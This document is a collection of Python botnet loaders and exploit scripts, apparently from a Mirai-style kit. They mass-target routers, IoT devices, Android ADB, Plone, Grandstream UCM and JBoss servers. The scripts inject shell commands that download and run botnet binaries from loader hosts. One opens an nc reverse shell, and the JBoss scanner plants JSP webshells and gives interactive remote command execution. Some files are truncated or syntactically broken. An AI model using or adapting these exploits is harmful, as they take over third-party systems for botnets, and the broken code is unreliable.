cmd1 = "/bin/busybox wget -g 172.16.58.3 -l /tmp/mips -r /mips"
cmd2 = "chmod 777 /tmp/mips;/tmp/mips; rm -rf /tmp/mips"
payload1 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(172.16.58.3)</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
payload2 = "<?xml version=\"1.0\" ?>\n <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n <NewStatusURL>$(172.16.58.3)</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n </s:Body>\n </s:Envelope>"
class rtek(threading.Thread):
def __init__ (smips, ip):
threading.Thread.__init__(smips)
smips.ip = str(ip).rstrip('\n')
def run(smips):
try:
print "[Huawei] Loading - " + smips.ip
url = "http://" + smips.ip + ":37215/ctrlt/DeviceUpgrade_1"
requests.post(url, timeout=3, data=payload1, auth=HTTPDigestAuth('dslf-config', 'admin'))
requests.post(url, timeout=2.5, data=payload2, auth=HTTPDigestAuth('dslf-config', 'admin'))
except Exception as e:
pass
for ip in ips:
try:
n = rtek(ip)
n.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/kace.py
```python
import threading
import sys
import time
import random
import socket
import subprocess
import re
import os
import struct
import array
import requests
from threading import Thread
from time import sleep
from requests.auth import HTTPDigestAuth
from decimal import *
ips = open(sys.argv[1], "r").readlines()
def run(cmd):
subprocess.call(cmd, shell=True)
class k-1000(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
print "--> " + self.ip
url = "http://" + self.ip + "/service/krashrpt.php?kuid=\x60id | wget http://r.0.0.t.s.3.c/zen.sh; chmod 777 zen.sh; sh Ares.sh; rm -rf zen.sh\x60"
requests.get(url, timeout=3)
except Exception as e:
pass
for ip in ips:
try:
r = k-1000(ip)
r.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/linksys.py
```python
import threading, sys, time, random, socket, subprocess, re, os, struct, array, requests
from threading import Thread
from time import sleep
import requests
from requests.auth import HTTPDigestAuth
from decimal import *
ips = open(sys.argv[1], "r").readlines()
url_data = {
"submit_button": "",
"change_action": "",
"action": "",
"commit": "0",
"ttcp_num": "2",
"ttcp_open": "2",
"ttcp_size": "2",
"ttcp_ip": "-h `cd /tmp; rm -rf kakeii.mpsl; wget http://8.8.8.8/Lpjin23/kakeii.mpsl; chmod 777 kakeii.mpsl; ./kakeii.mpsl Bluesclues`",
"StartEPI": "1",
}
class rtek(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
print "[LINKSYS] Loading - " + self.ip
url = "http://"+self.ip+":8080/tmUnblock.cgi"
requests.post(url, data=url_data, timeout=3)
requests.get(url, timeout=3)
except Exception as e:
pass
for ip in ips:
try:
n = rtek(ip)
n.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/plone.py
```python
import threading, random, socket, time, sys, requests, re, os, subprocess
if len(sys.argv) < 3:
print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
sys.exit()
ip = "1.3.3.7" # BINS LOCATION IP
vulns = open(sys.argv[1], "r").readlines()
port = int(sys.argv[2]) # PORTS 80 8080 8081 8083
class send_payload(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
url = "http://" + self.ip + ":"+port+"/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://" + ip + "/zen.sh; curl -O http://" + ip + "/zen.sh; chmod +x zen.sh; ./zen.sh"
requests.get(url, timeout=8)
print "[PLONE] Loading: %s"%(self.ip)
except:
pass
for IP in vulns:
try:
ip = "".join(IP)
ip = ip.replace("\n", "")
t = send_payload(ip)
t.start()
time.sleep(0.03)
except:
pass
```
#### File: Botnets/Exploits/ucm.py
```python
import os
import re
import sys
import json
import argparse
import requests
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# UCM Exploit Loader
#$top_parser = argparse.ArgumentParser(description='')
#$top_parser.add_argument('--rhost', action="store", dest="rhost",
#$required=True, help="The remote host to connect to")
#$top_parser.add_argument('--rport', action="store", dest="rport", type=int,
#$help="The remote port to connect to", default=8089)
#$top_parser.add_argument('--lhost', action="store", dest="lhost",
#$required=True, help="The local host to connect back to")
#$top_parser.add_argument('--lport', action="store", dest="lport", type=int,
#$help="The local port to connect back to", default=1270)
#$args = top_parser.parse_args()
class Loader(object):
def infect(self, adress: str):
url = 'https://' + adress + ':' + "8089" + '/cgi'
print('[+] Sending getInfo request to ', url)
try:
resp = requests.post(url=url, data='action=getInfo', verify=False)
except Exception:
print('[-] Error connecting to remote target')
sys.exit(1)
if resp.status_code != 200:
print('[-] Did not get a 200 OK on getInfo request')
sys.exit(1)
if resp.text.find('{ "response":') != 0:
print('[-] Unexpected response')
sys.exit(1)
try:
parsed_response = json.loads(resp.text)
except Exception:
print('[-] Unable to parse json response')
sys.exit(1)
print('[+] Remote target info: ')
print('\t-> Model: ', parsed_response['response']['model_name'])
print('\t-> Version: ', parsed_response['response']['prog_version'])
match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
parsed_response['response']['prog_version'])
if not match:
print('[-] Failed to extract the remote targets version')
sys.exit(1)
major = int(match[1])
minor = int(match[2])
point = int(match[3])
patch = int(match[4])
if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
20):
print('[-] Unaffected version')
sys.exit(1)
else:
print('[+] Vulnerable version!')
print("[+] loaded, %s" %(adress))
try:
exploit = "admin\' or 1=1--`;cd /var/; wget http://172.16.31.10/skid.arm6 ; chmod 777 skid.arm6 ; ./skid.arm6 Jaws" #arm7
exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "172.16.31.10" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
resp = requests.post(url=url,
data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
except Exception as err:
print('[-] Failed to send payload')
sys.exit(1)
if resp.status_code != 200:
print('[-] Did not get a 200 OK on sendPasswordEmail request')
sys.exit(1)
try:
parsed_response = json.loads(resp.text)
except Exception:
print('[-] Unable to parse json response')
sys.exit(1)
if parsed_response['status'] == 0:
print('[+] Success! Clean exit.')
else:
print('[-] Something bad happened.')
def __init__(self, adress: str):
self.infect(adress)
with open(sys.argv[1], "r") as f:
for item in f.readlines():
threading.Thread(target=Loader, args=(item.rstrip(), )).start()
```
#### File: MIRAI SPLOITS/ADB-ANDROID/android.py
```python
import sys
import threading
import requests
import os
import socket
import time
from Queue import *
from threading import Thread
if len(sys.argv) < 3:
sys.exit("\033[37mUsage: python "+sys.argv[0]+" [list] [output]")
ips = open(sys.argv[1], "r").readlines()
output = sys.argv[2]
queue = Queue()
queue_count = 0
info = open(str(sys.argv[1]),'a+')
def rtek(ip):
ip = str(ip).rstrip("\n")
try:
adb = socket.socket()
adb.settimeout(5)
adb.connect((ip,5555))
os.system("echo "+ip+" >> "+output+"")
os.system("adb connect "+ip+"")
time.sleep(3);
os.system("adb -s "+ip+":5555 shell \"cd /data/local/tmp; wget http://172.16.58.3/a.sh; chmod 777 a.sh; sh a.sh; rm -rf a.sh\"")
adb.close()
except Exception:
adb.close()
pass
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=rtek, args=(input,))
thread.start()
time.sleep(0.05)
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
thread.join()
return
if __name__ == "__main__":
main()
```
#### File: MIRAI SPLOITS/HNAP UPNP/hnap.py
```python
SPLOITS/HNAP UPNP/hnap.py
#! python !#
import threading, sys, time, random, socket, re, os, requests
from Queue import *
from sys import stdout
from threading import Thread
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
queue_count = 0
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; busybox wget http://1.1.1.1/bins/mips; chmod 777 mips; ./mips hnap.exploit`'}
def hnap(host):
try:
print "Loading " + self.ip
url = "http://" + self.ip + /HNAP1"
requests.post(url, timeout=5, headers=headerlist, data=payload)
except:
pass
return
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=hnap, args=(input,))
thread.start()
except KeyboardInterrupt:
sys.exit("Interrupted? (ctrl + c)")
thread.join()
return
if __name__ == "__main__":
main()
```
#### File: MIRAI SPLOITS/IPMI/load_ipmi.py
```python
SPLOITS/IPMI/load_ipmi.py
#! python !#
import threading, sys, time, random, socket, re, os, struct, array, requests
buffer = "\"" + "A"*140 + "\x8c\xdd\x0a\x40" + "A"*139 + "\x78\xfe\xff\xff" + "A"*16 + "\xf8\xda\x09\x40" + "A"*8 + "\xac\xb0\x0d\x40\x68\x55\x0a\x40" + "A"*108 + "sleep 1;busybox wget https://i.imger.me/8c393eaa9.gif;exit;#" + "A"*1307 + "\""
ips = open(sys.argv[1], "r").readlines()
commandpayload = "M-SEARCH * HTTP/1.1\r\nHost:172.16.17.32:1900\r\nST:uuid:schemas:device:" + buffer + ":end\r\nMan:\"ssdp:discover\"\r\nMX:3\r\n\r\n"
class netis(threading.Thread):
def __init__ (self, ip):
threading.Thread.__init__(self)
self.ip = str(ip).rstrip('\n')
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "Attempting %s"%(self.ip)
s.sendto(commandpayload, (self.ip, 1900))
time.sleep(1)
except Exception:
pass
for ip in ips:
try:
n = netis(ip)
n.start()
time.sleep(0.01)
except:
pass
```
#### File: MIRAI SPLOITS/JBOSS FULL/jexboss_vulnscanner.py
```python
# Updates: https://github.com/joaomatosf/jexboss
# Free for distribution and modification, but the authorship should be preserved.
import httplib, sys, urllib, os, time
from urllib import urlencode
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
def getHost(url):
tokens = url.split("://")
if len(tokens) == 2: #foi fornecido protocolo
return tokens[1].split(":")[0]
else:
return tokens.split(":")[0]
def getProtocol(url):
tokens = url.split("://")
if tokens[0] == "https":
return "https"
else:
return "http"
def getPort(url):
token = url[6:].split(":")
if len(token) == 2:
return token[1]
elif getProtocol(url) == "https":
return 443
else:
return 80
def getConnection(url):
if getProtocol(url) == "https":
return httplib.HTTPSConnection(getHost(url), getPort(url))
else:
return httplib.HTTPConnection(getHost(url), getPort(url))
def getSuccessfully(url, path):
result = 404
time.sleep(5)
conn = getConnection(url)
conn.request("GET", path)
result = conn.getresponse().status
if result == 404:
conn.close()
time.sleep(7)
conn = getConnection(url)
conn.request("GET", path)
result = conn.getresponse().status
conn.close()
return result
def checkVul(url):
print ( GREEN +" ** Checking Host: %s **\n" %url )
path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console" : "/web-console/ServerInfo.jsp",
"JMXInvokerServlet" : "/invoker/JMXInvokerServlet"}
for i in path.keys():
try:
print GREEN + " * Checking %s: \t" %i + ENDC,
conn = getConnection(url)
conn.request("HEAD", path[i])
path[i] = conn.getresponse().status
if path[i] == 200 or path[i] == 500:
print RED + "[ VULNERABLE ]" + ENDC
else: print GREEN + "[ OK ]"
conn.close()
except:
print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC
path[i] = 505
return path
def autoExploit(url, type):
# exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5
# exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6
# exploitWebConsoleInvoker: tested and working in jboss 4
# exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5
print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url)
result = 505
if type == "jmx-console":
result = exploitJmxConsoleFileRepository(url)
if result != 200 and result != 500:
result = exploitJmxConsoleMainDeploy(url)
elif type == "web-console":
result = exploitWebConsoleInvoker(url)
elif type == "JMXInvokerServlet":
result = exploitJMXInvokerFileRepository(url)
if result == 200 or result == 500:
print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC
shell_http(url, type)
else:
print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n"
" Waiting for 7 seconds...\n "+ ENDC)
time.sleep(7)
def shell_http(url, type):
if type == "jmx-console" or type == "web-console":
path = '/jbossass/jbossass.jsp?'
elif type == "JMXInvokerServlet":
path = '/shellinvoker/shellinvoker.jsp?'
conn = getConnection(url)
conn.request("GET", path)
conn.close()
time.sleep(7)
resp = ""
#clear()
print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n"
print RED+" * "+url+": \n"+ENDC
headers = {"User-Agent" : "jexboss"}
for cmd in ['uname -a', 'cat /etc/issue', 'id']:
conn = getConnection(url)
cmd = urlencode({"ppp": cmd})
conn.request("GET", path+cmd, '', headers)
resp += " "+conn.getresponse().read().split(">")[1]
print resp,
while 1:
print BLUE + "[Type commands or \"exit\" to finish]"
cmd=raw_input("Shell> "+ENDC)
#print ENDC
if cmd == "exit":
break
conn = getConnection(url)
cmd = urlencode({"ppp": cmd})
conn.request("GET", path+cmd, '', headers)
resp = conn.getresponse()
if resp.status == 404:
print RED+ " * Error contacting the commando shell. Try again later..."
conn.close()
continue
stdout = ""
try:
stdout = resp.read().split("pre>")[1]
except:
print RED+ " * Error contacting the commando shell. Try again later..."
if stdout.count("An exception occurred processing JSP page") == 1:
print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC
else: print stdout,
conn.close()
def exploitJmxConsoleMainDeploy(url):
# MainDeployer
# does not work in jboss5 (bug in jboss5)
# shell in link
# /jmx-console/HtmlAdaptor
jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service"
"=MainDeployer&methodIndex=19&arg0="+jsp)
print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell "
"\n available on: "+jsp +ENDC)
conn = getConnection(url)
conn.request("HEAD", payload)
result = conn.getresponse().status
conn.close()
return getSuccessfully(url, "/jbossass/jbossass.jsp")
def exploitJmxConsoleFileRepository(url):
# DeploymentFileRepository
# tested and work in jboss4, 5.
# doest not work in jboss6
# shell jsp
# /jmx-console/HtmlAdaptor
jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61"
"%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C"
"%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
"%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20"
"%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65"
"%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71"
"%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72"
"%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74"
"%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73"
"%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29"
"%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69"
"%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65"
"%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29"
"%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E"
"%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64"
"%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70"
"%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20"
"%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" )
payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True")
conn = getConnection(url)
conn.request("HEAD", payload)
result = conn.getresponse().status
conn.close()
return getSuccessfully(url, "/jbossass/jbossass.jsp")
def exploitJMXInvokerFileRepository(url):
# tested and work in jboss4, 5
# MainDeploy, shell in data
# /invoker/JMXInvokerServlet
payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73"
"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
"\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
"\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
"\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
"\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
"\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
"\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
"\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
"\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
"\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
"\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
"\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
"\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
"\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
"\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
"\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
"\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
"\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
"\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
"\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
"\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
"\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
"\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
"\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
"\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
"\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
"\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
"\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
"\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
"\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
"\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
"\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
"\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
"\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
"\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
"\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
"\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
"\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
"\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
"\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
"\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
"\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
"\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
"\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
"\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
"\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
"\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
"\x00\x04\x70\x78")
conn = getConnection(url)
headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers)
response = conn.getresponse()
result = response.status
if result == 401:
print " Retrying..."
conn.close()
conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers)
response = conn.getresponse()
result = response.status
if response.read().count("Failed") > 0:
result = 505
conn.close
return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp")
def exploitWebConsoleInvoker(url):
# does not work in jboss5 (bug in jboss5)
# MainDeploy, shell in link
# /web-console/Invoker
#jsp = "http://www.joaomatosf.com/rnp/jbossass.war"
#jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp)
#jsp = "\\x" + jsp
payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e"
"\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65"
"\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e"
"\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae"
"\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61"
"\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f"
"\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73"
"\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f"
"\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75"
"\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"
"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65"
"\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a"
"\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f"
"\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06"
"\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58"
"\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
"\x2a"
#link
"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61"
"\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f"
"\x73\x73\x61\x73\x73\x2e\x77\x61\x72"
#end
"\x75\x72\x00\x13\x5b"
"\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e"
"\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00"
"\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e"
"\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e"
"\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63"
"\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00"
"\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65"
"\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65"
"\x70\x6c\x6f\x79\x65\x72\x78")
conn = getConnection(url)
headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation",
"Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"}
conn.request("POST", "/web-console/Invoker", payload, headers)
response = conn.getresponse()
result = response.status
if result == 401:
print " Retrying..."
conn.close()
conn.request("HEAD", "/web-console/Invoker", payload, headers)
response = conn.getresponse()
result = response.status
